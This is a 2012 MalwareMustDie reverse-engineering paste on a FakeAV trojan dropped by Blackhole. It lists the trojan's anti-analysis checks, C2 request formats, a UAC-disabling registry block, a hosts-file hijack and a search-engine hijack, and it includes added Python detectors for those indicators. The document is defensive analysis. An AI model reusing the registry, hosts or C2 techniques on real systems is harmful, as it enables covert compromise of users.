MalwareMustDie

#malwareMustDie - BHEK2 dropped FakeAV Trojan 20121219

Dec 19th, 2012
=======================================
#malwareMustDie - BHEK2 dropped FakeAV Trojan
Reversing Analysis
References: https://www.virustotal.com/file/72d25f65ba822eb314a43321546ccf698a4b30e51f37406c27846671543e621f/analysis/
References: http://blog.dynamoo.com/2012/12/malware-sites-to-block-191212.html
@unixfreaxjp ~]$ date
Thu Dec 20 01:26:55 JST 2012
=============================

Trojan sent parameter formats:

HTTP/1.1 GET hxxp://report.aaa.com/?I55520=%96%C7%A5%A2%D7%ABclj%98%D4i%9E%9Ffi%98m%A2gneg%C7%A8%D1%AE%99%97egh%A9%8B%E7%E5%AF%EB%A4%8D%85%5B%E8%9E%C9%A6jkmn%97%A1%A3%9Ck%D5%E4%9A%9B%8A%5B%A2%9B%94%AF%A9%A9%A3%A3%AAfmxf%ACx%9C%AFj%7Bzz%A2nmna%99%A4%9E%82iwwfa%A5%8B%E2%D4%E5%B1_eee%A3g%95%99eeef%A1eee%5E%93%9F%9Do%ABreb%60%A2%95%A1%B4%A7%98"

Where "report.aaa.com" resolves to the IP written into the malicious hosts file.
After copying itself and deleting the original, the trojan's activities were reversed as follows:

// Registry keys the code searches for...

SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\User Agent\Post Platform\
SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\User Agent\Post Platform\
Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders\


// Detection of the analysis software below....
// if any of it is detected the trojan won't run properly..

// by process/file name....
cv.exe
irise.exe
IrisSvc.exe
wireshark.exe
dumpcap.exe
ZxSniffer.exe
Aircrack-ng Gui.exe
observer.exe
tcpdump.exe
WinDump.exe
wspass.exe
Regshot.exe
ollydbg.exe
PEBrowseDbg.exe
windbg.exe
DrvLoader.exe
SymRecv.exe
Syser.exe
apis32.exe
VBoxService.exe
VBoxTray.exe
SbieSvc.exe
SbieCtrl.exe
SandboxieRpcSs.exe
SandboxieDcomLaunch.exe
SUPERAntiSpyware.exe
ERUNT.exe
ERDNT.exe
EtherD.exe
Sniffer.exe
CamtasiaStudio.exe
CamRecorder.exe
Software\CommView
// by registry key...
SYSTEM\CurrentControlSet\Services\IRIS5
Software\eEye Digital Security
SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\Wireshark
SOFTWARE\Microsoft\Windows\CurrentVersion\App Paths\wireshark.exe
SOFTWARE\ZxSniffer
SOFTWARE\Cygwin
SOFTWARE\Cygwin
SOFTWARE\B Labs\Bopup Observer
AppEvents\Schemes\Apps\Bopup Observer
Software\B Labs\Bopup Observer
SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\Win Sniffer_is1
Software\Win Sniffer
SOFTWARE\Classes\PEBrowseDotNETProfiler.DotNETProfiler
Software\Microsoft\Windows\CurrentVersion\Explorer\MenuOrder\Start Menu2\Programs\Debugging Tools for Windows (x86)
SYSTEM\CurrentControlSet\Services\SDbgMsg
Software\Microsoft\Windows\CurrentVersion\Explorer\MenuOrder\Start Menu2\Programs\APIS32
Software\Syser Soft
SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\APIS32
SOFTWARE\APIS32
SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\Oracle VM VirtualBox Guest Additions
SYSTEM\CurrentControlSet\Services\VBoxGuest
SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\Sandboxie
SYSTEM\CurrentControlSet\Services\SbieDrv
Software\Classes\Folder\shell\sandbox
Software\Classes\*\shell\sandbox



// Registry keys that the above software (SUPERAntiSpyware, ERUNT) writes, also checked...
SOFTWARE\SUPERAntiSpyware.com
SOFTWARE\Classes\SUPERAntiSpywareContextMenuExt.SASCon.1
SOFTWARE\SUPERAntiSpyware.com
SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\ERUNT_is1
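A triage script for the anti-analysis list above, written as an added example (not the paste author's code): given the strings dumped from a sample, it reports which of the tool process names and registry keys from the list are present, grouped by the kind of tool they detect, so an analyst can tell at a glance whether a new sample carries the same sandbox/debugger/sniffer checks. The indicator subset, the categories and the sample strings are constructed for the example.

```python
"""Strings-triage heuristic: match a sample's extracted strings against the
analysis-tool indicators listed above, grouped by what each indicator detects.
Added example; the indicator subset, categories and sample strings are constructed."""

# Subset of the indicators from the analysis above, grouped by tool family.
# Everything is lowercased because Windows file names and registry paths are
# case-insensitive.
TOOL_SIGNATURES = {
    "sniffer": {
        "wireshark.exe", "dumpcap.exe", "tcpdump.exe", "windump.exe",
        "zxsniffer.exe", "sniffer.exe", "software\\commview",
        "software\\microsoft\\windows\\currentversion\\uninstall\\wireshark",
    },
    "debugger": {
        "ollydbg.exe", "windbg.exe", "pebrowsedbg.exe", "syser.exe",
        "software\\syser soft",
        "system\\currentcontrolset\\services\\sdbgmsg",
    },
    "sandbox_vm": {
        "vboxservice.exe", "vboxtray.exe", "sbiesvc.exe", "sbiectrl.exe",
        "sandboxierpcss.exe", "sandboxiedcomlaunch.exe",
        "system\\currentcontrolset\\services\\vboxguest",
        "system\\currentcontrolset\\services\\sbiedrv",
        "software\\classes\\folder\\shell\\sandbox",
    },
    "snapshot_tool": {"regshot.exe", "erunt.exe", "erdnt.exe"},
}


def triage_strings(strings):
    """Return {category: sorted matched indicators} for the given strings."""
    hits = {category: set() for category in TOOL_SIGNATURES}
    for raw in strings:
        s = raw.strip().lower()
        for category, indicators in TOOL_SIGNATURES.items():
            if s in indicators:
                hits[category].add(s)
    return {c: sorted(v) for c, v in hits.items() if v}


def verdict(hits):
    """Rough label based on how many distinct tool families the sample checks for."""
    categories = len(hits)
    if categories >= 3:
        return "anti-analysis aware (multiple tool families)"
    if categories >= 1:
        return "some anti-analysis checks"
    return "no known anti-analysis strings"


# Constructed strings output for a hypothetical sample (not from the paste).
SAMPLE_STRINGS = [
    "kernel32.dll",
    "wireshark.exe",
    "OLLYDBG.EXE",
    "SYSTEM\\CurrentControlSet\\Services\\VBoxGuest",
    "SbieSvc.exe",
    "Software\\Microsoft\\Windows\\CurrentVersion\\Run",
]

if __name__ == "__main__":
    found = triage_strings(SAMPLE_STRINGS)
    for category, indicators in found.items():
        print(f"{category}: {', '.join(indicators)}")
    print(verdict(found))
```

Feed it the output of a strings tool (one string per line) to compare a new dropper against this sample's evasion set; a sample that matches several families is worth detonating on bare metal or with the tool names changed.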

// Using DNSAPI.dll calls
DnsFlushResolverCache

// Using orig WS2_32.dll
WSAWaitForMultipleEvents
WSACreateEvent
WSAEventSelect
WSACloseEvent

// WININET.dll
DeleteUrlCacheEntryW
InternetConnectA
InternetQueryDataAvailable
InternetReadFile
HttpSendRequestW
HttpOpenRequestA
HttpAddRequestHeadersA
InternetOpenA
InternetCloseHandle

// iphlpapi.dll
GetAdaptersInfo

// KERNEL32.dll
eTime
DeleteFileW
CreateThread
ExpandEnvironmentStringsW
CreateFileA
MoveFileExA
GetFileAttributesA
CreateDirectoryA
SetFileAttributesA
DeleteFileA
FindFirstFileW
GetVolumeInformationA
GetVersionExW
FindClose
DeviceIoControl
ExpandEnvironmentStringsA
CopyFileA
FindFirstFileA
FindNextFileA
WaitForSingleObjectEx
lstrcatW
GetTempFileNameW
MoveFileExW
WriteFile
ReadFile
CreateFileW
GetTempPathW
GetLocaleInfoA
GetVolumeInformationW
HeapAlloc
HeapFree
GetProcessHeap
LocalAlloc
CreateRemoteThread
OpenProcess
VirtualAllocEx
ProcessIdToSessionId
LocalFree
WriteProcessMemory
InterlockedDecrement
SetEndOfFile
GetFileSize
SetFilePointer
GetTickCount

// USER32.dll
FindWindowA
DispatchMessageW
CreateDialogParamW
ShowWindow
EndDialog
ReleaseDC
MessageBoxA
IsDialogMessageW
TranslateMessage
GetDC
wsprintfW
BeginPaint
SendMessageA
KillTimer
PostQuitMessage
GetMessageW
SetTimer
DestroyWindow
EndPaint
wsprintfA

// GDI32.dll
GetObjectA
GetObjectW
CreateCompatibleBitmap
CreateCompatibleDC
SelectObject
DeleteDC
BitBlt

// ADVAPI32.dll
RegSetValueExA
RegQueryValueExA
RegEnumKeyExA
RegOpenKeyExA
RegQueryInfoKeyA
GetUserNameA
RegCloseKey
RegCreateKeyExW
AllocateAndInitializeSid
RegEnumValueW
FreeSid
CheckTokenMembership
RegSetValueExW
InitializeSecurityDescriptor
SetSecurityDescriptorDacl
RegCreateKeyExA
InitializeAcl
AddAccessAllowedAce
RegEnumValueA
SetFileSecurityA
CreateServiceW
CloseServiceHandle
OpenSCManagerW
StartServiceW
RegQueryValueExW
RegOpenKeyExW

// SHELL32.dll
ShellExecuteW
CommandLineToArgvW
SHChangeNotify

// OLEAUT32.dll
CoUninitialize
CreateStreamOnHGlobal
CoInitialize
CoCreateInstance
CoInitializeSecurity
CoInitializeEx
ole32.dll

// ntdll.dll
NtConnectPort
NtRequestWaitReplyPort
RtlNtStatusToDosError
NtClose
NtDelayExecution
NtCreateSection
NtQuerySystemTime


// urlmon.dll
EnumProcesses
GetProcessImageFileNameW
PSAPI.DLL
URLDownloadToFileW

// Data to be prepared & passed to server/C2
Cache-Control:
Connection:
Date:
Pragma:
Transfer-Encoding:
Upgrade:
Via:
Age:
Location:
Proxy-Authenticate:
Public:
Retry-After:
Server:
Vary:
Warning:
WWW-Authenticate:
Content-Length:
Transfer-Encoding:

========================================
First CNC comm structure (reversed code)
========================================

// The structure of the C2 download URL....
update%s.%s.com

// random seed chars...
// + pseudorandom assembly of the URLs...

abcdefghijklmnopqrstuvwxyz0123456789
$%s&%s%s$
?%c%c=%s

// requested HTTP 1st download structure (begins w/ the user-agent)

Mozilla/5.0 (Windows NT 6.1; WOW64; rv:2.0b8pre) Gecko/20101114 Firefox/4.0b8pre
GET
Host: %s

====================
second comm
===================
// how the encrypted info is sent & its generator strings (the second line is the standard base64 alphabet):

$%s&controller=sign&data=%s&mid=%s$
ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/

// here we go...
GET %s?%s HTTP/1.1
Host: %s
User-Agent: %s

// accepted communication user-agent (note the .NET CLR markers)
Mozilla/4.0 (compatible; MSIE 8.0; Trident/4.0; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.0.04506.590; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729)
Mozilla/4.0 (compatible; MSIE 8.0; Trident/4.0; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.0.04506.590; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729)

// sending the infected PC's category
POST %s HTTP/1.1
Host: %s
User-Agent: %s
Content-Length: %d
Content-Type: application/x-www-form-urlencoded


// OS version check; one of the strings below is used....
wvNT
wv2k
wvME
wvXP
wv2k3
wvVista
wv2k8
wvUnknown

// this could be the OS version..
%.08X%.08X%.08X%.08X
%.01d%.03d%.03d%.03d%.02d%.08X
wv=%s&uid=%d&lng=%s&mid=%s&res=%s&v=%08X
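A proxy-log check for the request formats reversed above (the `wv=...&uid=...&v=%08X` check-in, the `controller=sign&data=...&mid=...` upload, the `abbr=RTK&...&controller=microinstaller` update request and the `update%s.%s.com` host shape), written as an added example rather than the paste author's code. The log lines and host names below are constructed placeholders; the labels and thresholds are my own.

```python
"""Classify request URLs against the FakeAV query-string formats listed above.
Added example; log lines, host names and labels are constructed."""
import re
from urllib.parse import urlsplit, parse_qs

# OS category strings and query formats taken from the analysis above.
OS_TAGS = {"wvNT", "wv2k", "wvME", "wvXP", "wv2k3", "wvVista", "wv2k8", "wvUnknown"}
CHECKIN_KEYS = {"wv", "uid", "lng", "mid", "res", "v"}   # wv=%s&uid=%d&lng=%s&mid=%s&res=%s&v=%08X
INSTALLER_KEYS = {"abbr", "setupType", "uid", "ttl", "controller", "pid"}
UPDATE_HOST = re.compile(r"update[a-z0-9]*\.[a-z0-9-]+\.com", re.I)   # update%s.%s.com


def classify_request(url):
    """Return a label for one request URL, or None if it matches no known format."""
    parts = urlsplit(url)
    qs = parse_qs(parts.query, keep_blank_values=True)
    keys = set(qs)

    # Check-in: every field present, OS tag from the known set, uid numeric, v = 8 hex digits.
    if CHECKIN_KEYS <= keys:
        wv, uid, v = qs["wv"][0], qs["uid"][0], qs["v"][0]
        if wv in OS_TAGS and uid.isdigit() and re.fullmatch(r"[0-9A-Fa-f]{8}", v):
            return "fakeav-checkin"

    # Update/installer request; also verify the host follows update%s.%s.com.
    if (INSTALLER_KEYS <= keys and qs["abbr"] == ["RTK"]
            and qs["controller"] == ["microinstaller"] and qs["uid"][0].isdigit()):
        host_ok = bool(UPDATE_HOST.fullmatch(parts.hostname or ""))
        return "fakeav-update" if host_ok else "fakeav-update (unexpected host)"

    # Encrypted-data upload: $%s&controller=sign&data=%s&mid=%s$
    if qs.get("controller") == ["sign"] and {"data", "mid"} <= keys:
        return "fakeav-sign"
    return None


def scan_log(lines):
    """Return [(label, url)] for each "<method> <url>" log line that matches."""
    results = []
    for line in lines:
        fields = line.split()
        if len(fields) < 2:
            continue
        label = classify_request(fields[1])
        if label:
            results.append((label, fields[1]))
    return results


# Constructed proxy log lines ("<method> <url>"); hosts are placeholders.
SAMPLE_LOG = [
    "GET http://update1.example.com/?abbr=RTK&setupType=update&uid=4471&ttl=20121219&controller=microinstaller&pid=3",
    "POST http://report.example.com/?wv=wvXP&uid=4471&lng=ENU&mid=a1b2c3&res=1024x768&v=0001A3F4",
    "GET http://report.example.com/?controller=sign&data=ZmFrZQ&mid=a1b2c3",
    "GET http://www.bing.com/search?q=hosts+file",
    "GET http://other.example.net/?abbr=RTK&setupType=update&uid=9&ttl=1&controller=microinstaller&pid=3",
]

if __name__ == "__main__":
    for label, url in scan_log(SAMPLE_LOG):
        print(f"{label:<32} {url}")
```

Matching on the full key set plus the value shapes (OS tag, numeric uid, 8-hex-digit v) keeps the check from firing on ordinary sites that happen to use a `uid` or `controller` parameter; the host check is kept separate so a request with the right query but an unexpected host is still surfaced for review.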

// likely domain structure:
report.*
*.com
*.cfgbin


// requested data
HTTP/1.1
GET
Host: update1.randomstring.com <======= //noted this....
User-Agent: IE7
/?abbr=RTK&setupType=update&uid=%d&ttl=%s&controller=microinstaller&pid=3
HTTP/1.1
HEAD
Host: update1.randomstring.com
User-Agent: IE7
<input type="hidden" name="%[^"]" value="%[^"] ">
HTTP/1.1
/update_c1eec.exe
POST
Host: update1.randomstring.com
User-Agent: IE7
/?abbr=RTK&setupType=update&uid=%d&ttl=%s&controller=microinstaller&pid=3
HTTP/1.1
GET
Host: update1.randomstring.com
User-Agent: IE7
Data Buffer
Build/13.0
patch:0
Version/10.0
ver:2.0
update/0
Mod/0
Service 1.0
lib/5.0
Library1.0
App/7.0
compat/0
feed/7.1.0
system:3.0
control/5.0
Engine/4.0
runtime 11.0
layout/2.0
Build/14.0
patch:10
Version/11.0
ver:3.0
update/10
Mod/3.0
Service 2.0
lib/6.0
Library2.0
App/8.0
compat/4.1.0
feed/7.2.0
system:4.0
control/6.0
Engine/5.0
runtime 12.0
layout/3.0
Build/15.0
patch:20
Version/12.0
ver:4.0
update/20
Mod/4.0
Service 3.0
lib/7.0
Library3.0
App/9.0
compat/4.2.0
feed/7.3.0
system:5.0
control/7.0
Engine/6.0
runtime 13.0
layout/4.0
AppData
\Mozilla\Firefox\Profiles\
\prefs.js
user_pref ( " general.useragent.extra.%[^"] " , " %[^"] " ) ;
user_pref("general.useragent.extra.%s", "%s"); <=== // and this....

// path where the FakeAlert is stored...
%appdata%\ScanDisc.exe
%appdata%
%s\%X.reg
%s\mcp.ico

// Making shortcuts...
%s\mcp.ico
shortcut
shortcut
My Computer
.mcp

// registry to be written:
Windows Registry Editor Version 5.00
[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System]
"ConsentPromptBehaviorAdmin"=dword:0
"ConsentPromptBehaviorUser"=dword:0
"EnableLUA"=dword:0
[HKEY_LOCAL_MACHINE\Software\Microsoft\Windows]
"update"="%s"
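The .reg text above is what the trojan writes via `%s\%X.reg`; the three dwords under Policies\System switch UAC off. As an added example (not the paste author's code), here is a small .reg parser plus a check that spells out what each zeroed value means, so a responder can run it over a recovered .reg file or a registry export from an infected host. The .reg content below is reconstructed from the strings above with a placeholder in place of the `%s` path.

```python
"""Parse .reg export text and flag UAC-weakening values and the trojan's
"update" marker. Added example; the sample .reg content is reconstructed from
the analysis above with a placeholder path."""
import re

UAC_POLICY_KEY = r"hkey_local_machine\software\microsoft\windows\currentversion\policies\system"
MARKER_KEY = r"hkey_local_machine\software\microsoft\windows"

# What a value of 0 means for each UAC setting (documented Windows semantics).
UAC_ZERO_MEANS = {
    "enablelua": "UAC disabled entirely (takes effect after reboot)",
    "consentpromptbehavioradmin": "administrators elevate silently, no consent prompt",
    "consentpromptbehavioruser": "standard users' elevation requests are auto-denied",
}


def parse_reg(text):
    """Minimal parser for .reg text: {key (lowercased): {name: value}}.
    dword values become ints; quoted strings lose their quotes."""
    keys, current = {}, None
    for line in text.splitlines():
        line = line.strip()
        if not line or line.startswith("Windows Registry Editor"):
            continue
        key_match = re.fullmatch(r"\[(.+)\]", line)
        if key_match:
            current = key_match.group(1).lower()
            keys.setdefault(current, {})
            continue
        value_match = re.fullmatch(r'"([^"]+)"=(.+)', line)
        if value_match and current is not None:
            name, raw = value_match.groups()
            if raw.startswith("dword:"):
                value = int(raw[len("dword:"):], 16)
            elif len(raw) >= 2 and raw[0] == raw[-1] == '"':
                value = raw[1:-1]
            else:
                value = raw
            keys[current][name] = value
    return keys


def uac_findings(reg):
    """Return human-readable findings for UAC values that are set to 0."""
    findings = []
    for name, value in reg.get(UAC_POLICY_KEY, {}).items():
        meaning = UAC_ZERO_MEANS.get(name.lower())
        if meaning and value == 0:
            findings.append(f"{name}=0: {meaning}")
    return findings


def update_marker(reg):
    """Return the string stored in the trojan's "update" value, or None."""
    for name, value in reg.get(MARKER_KEY, {}).items():
        if name.lower() == "update":
            return value
    return None


# Reconstructed from the registry text in the analysis; the path is a placeholder.
SAMPLE_REG = r"""Windows Registry Editor Version 5.00
[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System]
"ConsentPromptBehaviorAdmin"=dword:0
"ConsentPromptBehaviorUser"=dword:0
"EnableLUA"=dword:0
[HKEY_LOCAL_MACHINE\Software\Microsoft\Windows]
"update"="C:\PLACEHOLDER\update.exe"
"""

if __name__ == "__main__":
    reg = parse_reg(SAMPLE_REG)
    for finding in uac_findings(reg):
        print(finding)
    print("update marker:", update_marker(reg))
```

Registry key names are lowercased for lookup because the registry is case-insensitive and the strings above mix `SOFTWARE` and `Software`. Cleanup means restoring `EnableLUA` to 1 and the prompt-behaviour values to their previous settings, not just deleting the sample.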
Error opening file
Size of file: %ld bytes.
DEFAULT_PCID
Unknown__
Software\Microsoft\Windows\CurrentVersion\WindowsUpdate\
SusClientId
Unknown__
Software\Microsoft\Windows NT\CurrentVersion\
ProductId
Unknown__
Unknown__

// this is nasty.... the son of a B'&%('&%( is harvesting storage (disk) data...
\\.\PhysicalDrive%d
\\.\PhysicalDrive%d
\\.\PhysicalDrive%d
\\.\IDE21201.VXD
\\.\Scsi%d:
SCSIDISK
Drive%dModelNumber
Drive%dSerialNumber
Drive%dControllerRevisionNumber
Drive%dControllerBufferSize
Drive%dType
Removable
Fixed
Unknown
WD-W
IBM-
MAXTOR
Maxtor
WDC
%02X%02X%02X%02X%02X%02X
InstallDate
Software\Microsoft\Windows NT\CurrentVersion
InstallDate = %X

// overwrite the hosts file...
C:\Windows\system32\drivers\etc\hosts

// seeks the online source for the hosts info...
google-analytics
http://findgala.com/?&uid=%d&q={searchTerms}

// there goes the new hosts structure, with a new
// %d.%d.%d.%d entry to be written...

C:\Windows\system32\drivers\etc\hosts.txt
# Copyright (c) 1993-2006 Microsoft Corp.
# This is a sample HOSTS file used by Microsoft TCP/IP for Windows.
# This file contains the mappings of IP addresses to host names. Each
# entry should be kept on an individual line. The IP address should
# be placed in the first column followed by the corresponding host name.
# The IP address and the host name should be separated by at least one
# space.
# Additionally, comments (such as these) may be inserted on individual
# lines or following the machine name denoted by a '#' symbol.
# For example:
# 102.54.94.97 rhino.acme.com # source server
# 38.25.63.10 x.acme.com # x client host
127.0.0.1 localhost
::1 localhost
# Copyright (c) 1993-2006 Microsoft Corp.
# This is a sample HOSTS file used by Microsoft TCP/IP for Windows.
# This file contains the mappings of IP addresses to host names. Each
# entry should be kept on an individual line. The IP address should
# be placed in the first column followed by the corresponding host name.
# The IP address and the host name should be separated by at least one
# space.
# Additionally, comments (such as these) may be inserted on individual
# lines or following the machine name denoted by a '#' symbol.
# For example:
# 102.54.94.97 rhino.acme.com # source server
# 38.25.63.10 x.acme.com # x client host
127.0.0.1 localhost
::1 localhost
%d.%d.%d.%d
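The trojan rewrites the hosts file with the stock Microsoft template followed by its own `%d.%d.%d.%d` entry (the one "report.aaa.com" resolves through). An added example, not the paste author's code, of a hosts-file tamper check a responder can run: it parses the file, keeps the stock `localhost` lines, flags any name mapped to a non-local address, and flags watched names (such as google-analytics, which the strings above target) mapped anywhere. The hosts content below is constructed for the example.

```python
"""Hosts-file tamper check: flag non-local mappings and watched names.
Added example; the sample hosts content is constructed."""
import ipaddress

# Names the analysis above shows the trojan interested in; extend as needed.
WATCHED_NAMES = ("google-analytics",)


def parse_hosts(text):
    """Return [(line_no, address_text, [names])] for each non-comment entry."""
    entries = []
    for line_no, line in enumerate(text.splitlines(), 1):
        body = line.split("#", 1)[0].strip()   # drop comments, including trailing ones
        if not body:
            continue
        fields = body.split()
        entries.append((line_no, fields[0], fields[1:]))
    return entries


def hosts_findings(text, watched=WATCHED_NAMES):
    """Return (line_no, name, reason) tuples for suspicious entries."""
    findings = []
    for line_no, addr_text, names in parse_hosts(text):
        try:
            addr = ipaddress.ip_address(addr_text)
        except ValueError:
            findings.append((line_no, addr_text, "not a valid IP address"))
            continue
        # 127.0.0.1 / ::1 / 0.0.0.0 are the usual block-list targets, not redirects.
        local = addr.is_loopback or addr.is_unspecified
        for name in names:
            lname = name.lower()
            if lname == "localhost" and local:
                continue                      # the stock entries
            if any(w in lname for w in watched):
                findings.append((line_no, name, f"watched name mapped to {addr}"))
            elif not local:
                findings.append((line_no, name, f"mapped to non-local address {addr}"))
    return findings


# Constructed: the stock Windows template plus a block-list line and two appended entries.
SAMPLE_HOSTS = """# Copyright (c) 1993-2006 Microsoft Corp.
# This is a sample HOSTS file used by Microsoft TCP/IP for Windows.
# 102.54.94.97     rhino.acme.com          # source server
127.0.0.1       localhost
::1             localhost
0.0.0.0         ads.example.net           # local blocklist entry, not flagged
203.0.113.7     report.example.com
127.0.0.1       www.google-analytics.com
"""

if __name__ == "__main__":
    for line_no, name, reason in hosts_findings(SAMPLE_HOSTS):
        print(f"line {line_no}: {name}: {reason}")
```

Point it at `C:\Windows\system32\drivers\etc\hosts` (and the `hosts.txt` sibling the strings mention) on a suspect machine; any non-local mapping is a redirect the user did not ask for, and a watched name mapped to loopback is the analytics-blocking trick the trojan uses.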


// Now making a mess with your IE and Firefox search settings

\Software\Microsoft\Internet Explorer\SearchScopes
DefaultScope
URL
\searchplugins\
search.xml
<ShortName>search</ShortName>
<SearchPlugin xmlns="http://www.mozilla.org/2006/browser/search/">
<Description>Search for the best price.</Description>
<InputEncoding>windows-1251</InputEncoding>
http://findgala.com/?
<Url type="text/html" method="GET" template="%s">
<Image width="16" height="16">data:image/x-icon;base64,iVBORw0KGgoAAAANSUhEUgAAABAAAAAQCAIAAACQkWg2AAAAGXRFWHRTb2Z0d2FyZQBBZG9iZSBJbWFnZVJlYWR5ccllPAAAAaRJREFUeNpiVIg5JRURw0A0YAHio943kYV%2B%2Ff33%2BdvvX7%2F%2FMjEx8nKycrGzwKXOiPKzICvdeezLhCV3jp15%2Bfv%2FX0YGhv8MDDxMX2qKTIw0RK10eYD6QYqATvoPBkt3f5K0W9Ew4fjTFz%2F%2Bw8Dm3W8UPeZxqFa%2BevsFyD0twgfVsOfkRxHrtfV9u5BVQ8Crd98%2FffkGYQM1QJ20%2FfSPv79eNxQGYfpSVJADmcvEAHbr7oOX2dj%2FERNKIA2%2F%2Fz%2FxfCDhYVoDUDw5P6vf9%2B5iY0HVmZGQWm%2BN3fff%2Fn2k4eLHS739x%2FDiRs%2Ff%2F%2F5x8HO%2FOHzN3djfqgNjIwMgc6qzLx%2Fpy47j2zY%2Feff06tXhOUucgxeun33AUZGpHh4%2Bvo7t8EyIJqz%2FhpasD59%2B5dNrqdnznZIsEL9ICXCsWuBCwvTv%2FymS5PWPP32ExEALz%2F%2BB5r848cPCJcRaMP9xaYQzofPPzfuvrnj0Jst%2B5%2F8%2Bc4sLPeDkYlRgJc93VPE18NIXkYUmJYQSQMZ%2FP3379uPH7%2F%2F%2FEETBzqJ0WqLGvFpe2LCC4AAAwAyjg7ENzDDWAAAAABJRU5ErkJggg%3D%3D</Image>
<Param name="q" value="{searchTerms}"/>
<Param name="uid" value="%d"/>
</Url>
</SearchPlugin>
search
\prefs.js.bak
browser.search.selectedEngine
user_pref("browser.search.selectedEngine", "%s");
user_pref("browser.search.selectedEngine", "%s");
http://findgala.com/?&uid=%d&q={searchTerms}
/chrome/report.html
www.bing.com


// Some uninstall info...
Software\Microsoft\Windows\CurrentVersion\Uninstall
SystemComponent
ParentKeyName
OperatingSystem
DisplayName

// Additional: installed data save paths...

c:\cgvi5r6i\vgdgfd.72g
C:\file.exe


----
#MalwareMustDie!!